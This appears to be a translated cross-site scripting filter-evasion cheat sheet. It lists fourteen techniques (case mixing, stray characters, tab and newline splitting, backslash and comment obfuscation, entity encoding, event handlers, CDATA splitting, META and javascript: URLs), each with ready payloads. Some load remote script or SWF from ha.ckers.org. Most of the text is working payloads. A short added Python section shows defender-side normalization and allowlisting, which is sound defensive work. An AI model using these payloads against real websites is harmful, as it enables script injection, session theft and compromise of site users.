1. Change the letter case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade the regular-expression check

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tabs or newlines to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

(gap in the first payload) -> tab
(gap in the second payload) -> new line
The control characters themselves did not survive copying; only the gaps they left are visible.

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

(The hex-entity-encoded form and its source look identical below because the entities were decoded when the post was rendered.)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
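Added defender-side example, not part of the original post: the common thread in items 1, 4, 6, 7, 8 and 14 is that a filter inspects the raw text while the browser inspects the decoded text, so a filter has to normalize first (entity-decode, drop control characters, resolve CSS escapes and comments, lowercase) and then apply an allowlist. The scheme allowlist SAFE_SCHEMES, the function names and the sample inputs are assumptions made for this illustration.

```python
import html
import re

# Assumed application policy: only these URL schemes are allowed in src/href.
SAFE_SCHEMES = {"http", "https", "mailto"}
# Tab, newline, CR and other control characters that browsers discard in a URL.
_URL_JUNK = re.compile(r"[\x00-\x20\x7f]")
# CSS: keep quoted strings (group 1) untouched and remove /* ... */ comments,
# so the "*//*" decoy inside a string (item 7) does not fool the stripper.
_CSS_COMMENT = re.compile(r"""("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')|/\*.*?\*/""", re.S)
# CSS backslash escapes: \6A (hex code point) or \s (literal next char), as in expre\ssion.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6}\s?|.)", re.S)

def naive_is_safe_url(value: str) -> bool:
    """The blocklist check that items 1, 6 and 8 above are built to slip past."""
    return "javascript:" not in value.lower()

def normalize_url(value: str) -> str:
    """Entity-decode, drop control characters, lowercase (for inspection only)."""
    return _URL_JUNK.sub("", html.unescape(value)).lower()

def is_safe_url(value: str) -> bool:
    """Allowlist: a relative URL, or a scheme the application explicitly permits."""
    m = re.match(r"([a-z][a-z0-9+.-]*):", normalize_url(value))
    return True if m is None else m.group(1) in SAFE_SCHEMES

def _css_unescape(m):
    body = m.group(1)
    if re.fullmatch(r"[0-9a-fA-F]{1,6}\s?", body):
        return chr(int(body.strip(), 16))  # \6A -> 'j'
    return body                             # \s  -> 's'

def normalize_css(value: str) -> str:
    """Strip comments, resolve escapes, decode entities, drop whitespace, lowercase."""
    s = _CSS_COMMENT.sub(lambda m: m.group(1) or "", html.unescape(value))
    s = _CSS_ESCAPE.sub(_css_unescape, s)
    return re.sub(r"\s+", "", s).lower()

def css_is_suspicious(value: str) -> bool:
    """Flags the CSS vectors of items 4, 7 and 14 once their obfuscation is undone."""
    s = normalize_css(value)
    return "expression(" in s or "javascript:" in s

if __name__ == "__main__":
    # Constructed samples mirroring the post's payloads, with real tab/newline bytes.
    for v in ["jav\tascr\nipt:alert('XSS3')", "&#x6A;avascript:alert(1)", "/img/a.png"]:
        print(f"{v!r:34} naive={naive_is_safe_url(v)} allowlist={is_safe_url(v)}")
    for v in ["width: expre\\ssi\\on(alert('XSS31'));", "xss:expr/*anyword*/ession(1)"]:
        print(f"{v!r:34} suspicious={css_is_suspicious(v)}")
```

The blocklist passes the tab-separated and entity-encoded values while the allowlist rejects them; for user-controlled CSS the safer policy is to not accept it at all, since the detector above only covers the constructs shown on this page.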